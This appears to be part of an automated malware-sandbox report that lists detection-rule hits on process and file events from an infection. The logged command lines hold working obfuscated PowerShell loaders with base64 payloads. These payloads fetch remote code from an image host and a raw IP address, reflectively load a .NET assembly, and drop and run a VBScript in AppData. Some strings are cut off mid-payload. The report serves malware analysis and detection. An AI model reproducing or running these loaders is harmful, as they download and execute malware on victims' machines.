                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdH
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEl
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , ProcessId: 612, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", ProcessId: 5748, ProcessName: csc.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1776, TargetFilename: C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , ProcessId: 612, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1776, TargetFilename: C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", CommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduK

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5n